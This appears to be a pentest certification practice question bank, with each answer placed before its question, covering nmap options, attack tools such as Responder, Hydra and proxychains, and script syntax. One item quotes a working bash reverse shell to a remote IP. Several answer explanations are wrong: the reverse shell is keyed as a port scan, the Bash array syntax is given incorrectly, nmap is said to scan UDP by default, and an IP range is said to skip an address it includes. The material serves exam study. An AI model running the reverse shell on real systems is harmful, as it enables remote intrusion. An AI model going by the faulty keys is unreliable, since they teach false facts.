B. The --top-ports 1000 option tells nmap to scan the default ports used by the 1,000 most popular network services. The --exclude-ports 53 option tells nmap to skip port 53 (the default port used by DNS servers) during the scan.

As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network for the 1000 most popular network services to see whether they are installed and running. However, you already know this host is running the DNS service, so you want to skip this port in the scan. Which nmap command will do this? A. nmap 192.168.1.200 -p 1-1000 --exclude-ports 53 B. nmap 192.168.1.200 --top-ports 1000 --exclude-ports 53 C. nmap 192.168.1.200 --well-known-ports --exclude-ports 53 D. nmap 192.168.1.200 --top-ports 1000

B. An if/then flow control structure in PowerShell uses the following syntax: - if condition { - commands... - } Else { - commands... - }

Consider the following snippet from a script: If (x -eq 2) { 'This number is 2' } Else { 'This number is not 2' } What scripting language is this snippet written in? A. Ruby B. PowerShell C. Bash D. Python

A. An if/then flow control structure in Ruby uses the following syntax: - if condition - commands... - else - commands... - end

Consider the following snippet from a script: if _x > 2 puts "x is greater than 2" else puts "x is less than or equal to 2" end What scripting language is this snippet written in? A. Ruby B. PowerShell C. Bash D. Python

D. The proxychains tool allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.

During a black box penetration test, you need to use evasion to obscure your presence from system administrators in the target organization. Which tool could you use to do this? A. YASCA B. SonarQube C. SAST D. proxychains

B and C. You could use either Burp Suite or OWASP ZAP. Both of these tools could be used to intercept network traffic flowing between users running a web browser and the target organization's web application server. By proxying a connection, the penetration tester can read the contents of the intercepted traffic.

During a gray box penetration test, the tester needs to proxy connections between the target organization's web application server and client systems running web browsers. Which web proxy penetration testing tools could the tester use to do this? (Choose two.) A. searchsploit B. Burp Suite C. OWASP ZAP D. Impacket E. Empire

A. The netcat utility could be used to set up a reverse shell exploit that allows the tester to remotely control the compromised system.

During a gray box penetration test, the tester wants to be able to set up a reverse shell exploit where a compromised system on the target network "calls home" to a listener set up on the tester's laptop to enable the tester to remote control the compromised system. Which remote access tool could be used to do this? A. netcat B. Responder C. Impacket D. BeEF

D. The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.

During a gray box penetration test, the tester wants to poison queries for the target organization's domain controller in order to redirect client requests to the tester's laptop and capture usernames and hashed passwords. Which utility could be used to do this? A. Searchsploit B. Empire C. Impacket D. Responder

A. In bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp/<host>/<port>. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. Here's a breakdown of the code: - /bin/bash -i invokes an interactive bash shell. - > &/dev/tcp/<host>/<port> pipes that shell to the tester. - 0<&1 2>&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2>).

During a penetration test, the following line of code was found in an exploited machine's history file: bin/bash -i >& /dev/tcp/192.168.0.10/80 0> &1 What best describes what this command line does? A. A port scan has been performed. B. Obtains the web server's banner. C. Redirects a teletypewriter (TTY) to a remote system. D. Removes the error logs for the given IP.

A and E. The many unsuccessful login attempts is a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.

During a penetration test, the system administrator checks the log of the Linux server and notices thousands of unsuccessful login attempts. Which tool could the penetration tester be using? (Choose two.) A. Hydra B. YASCA C. nmap D. Tableau E. Medusa

D. In this scenario, the question specifically states "name resolution requests." In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

During an internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. A tester wants to impersonate network resources and collect authentication requests. What tool should be used? A. Ettercap B. Medusa C. Tcpdump D. Responder

E. The case structure is the best option presented to evaluate the user's choice of multiple selections and run the appropriate set of commands as a result.

In a Bash script, you need to prompt the user to select from one of seven different options presented with the echo command. Which control structure would best evaluate the user's input and run the appropriate set of commands? A. while loop B. for loop C. until loop D. if/then/else E. case

C and D. When declaring an array, both Ruby and Python use the same syntax: array_name = [value1, value2, value3, ...].

While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax: PrimeNumArray = [2, 3, 5, 7, 11] Which type of script could this be? (Choose two.) A. PowerShell B. Bash C. Ruby D. Python

A. When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: echo $PrimeNumArray[2] Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

B. When referencing a value from an array, Bash uses the following syntax: {$array_name[position]}. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: echo {$PrimeNumArray[2]} Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

D. When referencing a value from an array, Python uses the following syntax: (array_name[position]). In this example, the print command is being told to print the second value of the array named PrimeNumArray.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: print (PrimeNumArray[2]) Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

C. When referencing a value from an array, Ruby uses the following syntax: array_name[position]. In this example, the puts command is being told to use the second value of the array named PrimeNumArray.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: puts PrimeNumArray[2] Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

B. When referencing the value of a variable, Bash uses the following syntax: {$variable_name}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.

While reading an executable script file, you see a line near the beginning of the script that references the value of a variable using the following syntax: echo {$ServerName} Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

C. Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a Bash script will send both stdout and stderr to the same file.

Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this? A. tail /var/log/firewall 1> lastevents 2> lastevents B. tail /var/log/firewall > lastevents C. tail /var/log/firewall 1> lastevents 2> &1 D. tail /var/log/firewall 1&2> lastevents

A. Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client's systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.

You are a penetration tester and have run the following Nmap scan on a computer: nmap -sV 192.168.10.5. The client indicated that it had disabled Telnet from its environment. However, the Nmap scan results show that port 22 is closed and that port 23 is open to SSH. What might have happened to cause this? A. The organization did not disable Telnet. B. The nmap results contain a false positive for port 23. C. The service is running on a nonstandard port. D. Port 22 is filtered.

D. The nmap 192.168.1.1 -O command causes the nmap utility to use TCP/IP stack fingerprinting to determine the operating system installed on the remote host.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command should you use to do this? A. nmap 192.168.1.1 -sS B. nmap 192.168.1.1 -sL C. nmap 192.168.1.1 -sV D. nmap 192.168.1.1 -O

A. PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it's for setting, changing, or retrieving the value stored in that variable.

You are a penetration tester and want to create an array using a PowerShell script. Which lines of code would you use? A. $ports = 20, 25, 80, 443 B. ports = (20,25,80,443) C. ports = [20,25,80,443] D. $ports= [20,25,80,443]

C. Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

You are a penetration tester, and you are conducting a test on a specific client database server. You want to detect any vulnerabilities on the database server. Which tool will best assist you? A. Nessus B. Nikto C. Sqlmap D. OpenVAS

A. Custom Word List (CeWL) Generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization's websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

You are a penetration tester, and you are planning to create a custom wordlist of common words and catchphrases about your client using the client's website. What is the name of the tool that you can utilize to assist with building a custom wordlist? A. CeWL B. Hashcat C. Hydra D. Medusa

C. Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

You are a penetration tester, and you plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see when you use this script: hping remoteclient.com -S -V -p 80? A. HTTP traffic to TCP port 80 B. HTTPS traffic to TCP port 80 C. TCP SYNs to TCP port 80 D. TCP three-way handshake to TCP port 80

B. Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket attacks. In this scenario, however, the question states "over the wire." Mimikatz is the only tool that cannot be used that way.

You are a penetration tester, and you want to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack. Which tool does not allow you to capture NTLM v2 hashes over the wire? A. Ettercap B. Mimikatz C. Metasploit D. Responder

A. Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit's SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you've captured the messages.

You are a penetration tester, and you want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use? A. Impacket B. Metasploit C. Responder D. Wireshark

A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal's geographic location by identifying that terminal's IP address.

You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet and that will show you the geoIP information, if available. Which tool can you use to accomplish this? A. Censys B. Shodan C. theHarvester D. Whois

B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet by using a variety of filters. Which tool can you use to accomplish this? A. Censys B. Shodan C. theHarvester D. Whois

B. Using nmap's basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system's hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1-65,535.

You are a penetration tester, and you want to use nmap to scan a remote system. You will be using the following command: nmap 142.78.32.0/24 How many TCP ports will you be scanning? A. 256 B. 1,000 C. 1,024 D. 65,535

A. The nmap 192.168.1.1 -A command enables OS detection, service version detection, script scanning, and traceroute to the remote host.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command could you use to do this? A. nmap 192.168.1.1 -A B. nmap 192.168.1.1 -T1 C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -f

A. The -sS option causes the nmap utility to conduct a SYN port scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sS B. nmap 192.168.1.1 -sT C. nmap 192.168.1.1 -sU D. nmap 192.168.1.1 -sA

A and B. The nmap 192.168.1.1 -sS command causes the nmap utility to conduct a SYN port scan of the specified target system. Likewise, the nmap 192.168.1.1 command also causes the nmap utility to conduct a SYN port scan of the specified target system because a SYN scan is the default used if no other scan type is specified.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which commands could you use to do this? (Choose two.) A. nmap 192.168.1.1 -sS B. nmap 192.168.1.1 C. nmap 192.168.1.1 -sV D. nmap 192.168.1.1 -O E. nmap 192.168.1.1 -T0

A. The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sA B. nmap 192.168.1.1 -T1 C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -ACK

C. The nmap 192.168.1.1 -sT command causes the nmap utility to conduct a TCP connect scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP connect scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sL B. nmap 192.168.1.1 -T1 C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -f

D. The nmap 192.168.1.1 -sU command causes the nmap utility to conduct a UDP port scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a UDP port scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sL B. nmap 192.168.1.1 -U C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -sU

D. The nmap 192.168.1.1-254 -p 23 command causes the nmap utility to scan the specified range of IP addresses for hosts with Telnet port 23 open.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) that have the Telnet port open. Which command should you use to do this? A. nmap 192.168.1.0/24 -s 23 B. nmap 192.168.1.0/24 -p 21 C. nmap 192.168.1.1-254 -p 21 D. nmap 192.168.1.1-254 -p 23

B. The nmap 192.168.1.1-254 -sn command causes the nmap utility to scan the specified range of IP addresses for hosts. It lists all the hosts found without actually scanning any of their ports.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning any ports on those hosts. Which command should you use to do this? A. nmap 192.168.1.0/16 -sL B. nmap 192.168.1.1-254 -sn C. nmap 192.168.1.1-254 -sW D. nmap 192.168.1.0/16 -sM

A. The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this? A. nmap 192.168.1.0/24 -sL B. nmap 192.168.1.0/24 --list C. nmap 192.168.1.1-254 -sW D. nmap 192.168.1.1-254 -sM

A. The nmap 192.168.1.10-13 -sA command causes the nmap utility to conduct a TCP ACK scan of the target systems with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a TCP ACK scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13. Which command should you use to do this? A. nmap 192.168.1.10-13 -sA B. nmap 192.168.1.0/24 -sA C. nmap 192.168.1.10/24 -sA D. nmap 192.168.1.10-13 -sT

C. Because the hosts to be scanned do not have contiguous IP addresses, you must specify each host individually. In this case, the nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU command causes the nmap utility to conduct a UDP port scan of each specified system.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a UDP scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, 192.168.1.13, and 192.168.1.15. Which command should you use to do this? A. nmap 192.168.1.10-15 -sU B. nmap 192.168.1.0/24 -sU C. nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU D. nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -

A. The nmap 192.168.1.2 -p- command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to scan all of the ports on a network host with an IP address of 192.168.1.2. Which command should you use to do this? A. nmap 192.168.1.2 -p- B. nmap 192.168.1.2 -p all C. nmap 192.168.1.2 -s all D. nmap 192.168.1.2 -p 1-1024

A. When nmap indicates a port is closed, it usually means either the associated service is not installed at all or it has been installed but currently isn't running. Therefore, nothing is listening on its associated port.

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Closed. What could this mean? A. The Telnet service is installed but not running. B. The Telnet service is installed, running, and accessible. C. The Telnet service is not installed, and a different service is using its default port. D. The Telnet service is not installed. E. The Telnet service is installed and running, but a host firewall is blocking it

D. When nmap indicates a port is filtered, it usually means the associated service is installed and running, but a host firewall is blocking the port.

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Filtered. What does this likely mean? A. The Telnet service is installed but not running. B. The Telnet service is not installed. C. The Telnet service is not installed, and a different service is using its default port. D. The Telnet service is installed and running, but a host firewall is blocking it.

B. When nmap indicates a port is open, it usually means the associated service is installed, is running, and is accessible through the host firewall.

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Open. What does this mean? A. The Telnet service is installed but not running. B. The Telnet service is installed, running, and accessible. C. The Telnet service is not installed, and a different service is using its default port. D. The Telnet service is not installed.

C. The nmap 192.168.1.0/24 --exclude 192.168.1.250 command causes the nmap utility to scan every system on the subnet from .1 to .254 but skips the host with an IP address of 192.168.1.250.

You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0), but without scanning the host with an IP address of 192.168.1.250 (which you suspect is a honeypot host). Which command should you use to do this? A. nmap 192.168.1.1-254 B. nmap 192.168.1.0/24 --noscan 192.168.1.250 C. nmap 192.168.1.0/24 --exclude 192.168.1.250 D. nmap 192.168.1.1-254 --skip 192.168.1.250

D and E. The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254. Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254.

You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.) A. nmap 192.168.1.0 B. nmap 192.168.1.0-255 C. nmap 192.168.1.0 -m:255.255.255.0 D. nmap 192.168.1.0/24 E. nmap 192.168.1.1-254

B. In this scenario we are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statements.

You are writing the following Python code: if 1 == 1: print("howdy") elif 3 == 3: print("howdy") else: print("howdy") How many times will this code print the word howdy? A. 0 B. 1 C. 2 D. 3

C. The -iL file_name option tells nmap to read the specified file and scan only those hosts listed in the file.

You have created a list of target hosts that you want to scan with nmap and saved it to a text file named /root/targets.txt. Which command should you use to run the scan using this file? A. nmap -iR /root/targets.txt B. nmap --file /root/targets.txt C. nmap -iL /root/targets.txt D. nmap -iF /root/targets.txt

B. Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. echo $TargetHost B. read TargetHost C. readln TargetHost D. input $TargetHost

D. Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a PowerShell script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. TargetHost = input('Please enter a hostname:') B. read TargetHost C. TargetHost = gets D. $TargetHost = read-host -Prompt

A. Adding the TargetHost = input('Please enter a hostname:') line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a Python script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. TargetHost = input('Please enter a hostname:') B. read TargetHost C. TargetHost = gets D. $TargetHost = read-host -Prompt

C. Adding the TargetHost = gets line to a Ruby script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a Ruby script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. TargetHost = input('Please enter a hostname:') B. read TargetHost C. TargetHost = gets D. $TargetHost = read-host -Prompt

A and E. You can enter /bin/bash ~/myexploit or chmod u+x ~/myexploit to make the script execute.

You've created a Bash script in your home directory on a Linux system named myexploit. How can you execute it? (Choose two.) A. Enter /bin/bash ~/myexploit at the shell prompt. B. Enter myexploit at the shell prompt. C. Select Computer ➢ Run in the graphical desktop; then enter ~/ myexploit and select Run. D. Enter run ~/ myexploit at the shell prompt. E. Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.